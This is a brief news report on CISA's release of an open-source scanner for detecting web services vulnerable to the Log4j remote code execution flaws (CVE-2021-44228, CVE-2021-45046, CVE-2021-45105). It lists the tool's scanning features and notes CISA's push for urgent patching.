The CISA has announced the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046 & CVE-2021-45105
log4j-scanner is a project derived from other members of the open-source community by CISA’s Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities
This scanning solution builds upon similar tools, including an automated scanning framework for the CVE-2021-44228 bug dubbed Log4Shell.This enables security teams to scan network hosts for Log4j RCE exposure and spot web application firewall (WAF) bypasses that can allow threat actors to gain code execution within the organization’s environment.
CISA highlights the following features on log4j-scanner’s project page:
- Support for lists of URLs.
- Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools).
- Fuzzing for HTTP POST Data parameters.
- Fuzzing for JSON data parameters.
- Supports DNS callback for vulnerability discovery and validation.
- WAF Bypass payloads.
CISA’s also spearheading a push for urgently patching devices vulnerable to Log4Shell attacks to block threat actors’ attempts to exploit Log4Shell vulnerable systems and infect them with malware.